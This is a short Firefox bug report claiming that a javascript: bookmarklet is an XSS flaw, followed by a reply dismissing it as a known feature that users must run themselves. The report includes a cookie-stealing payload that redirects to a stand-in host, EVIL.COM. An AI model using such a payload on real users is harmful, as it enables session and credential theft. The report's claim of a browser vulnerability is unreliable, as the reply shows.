User Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 Steps to reproduce: 1. Open Mozilla Firefox browser. 2. Add a new bookmark by clicking "New Bookmark..." from Bookmarks Toolbar. 3. Enter any name to the Name field. 4. Enter the following payload in the Location field. javascript:prompt(document.domain,document.cookie) 5. Click Add button. Your bookmark will be saved. 6. Open any website from Mozilla Firefox, such as PayPal, Skrill, Gmail, Uber, Facebook etc. 7. Now click your new Bookmark button. 8. XSS will be triggered with current domain and cookies. 9. It will work on any website in Mozilla Firefox browser. Actual results: While click on the button (which location was set to payload), current website's domain and cookies' are poped-up with XSS. Expected results: This bug allow an attacker to steal users' cookies, credentials and able to do more. If an attacker use the following payload, then he can silently steal cookies and redirect the user to an evil site. Payload: javascript:document.location='http://WWW.EVIL.COM/cookiestealer.php?c='+document.cookie

This is a known feature of javascript bookmarklets, and not a bug. The user has to add and run the bookmark themselves.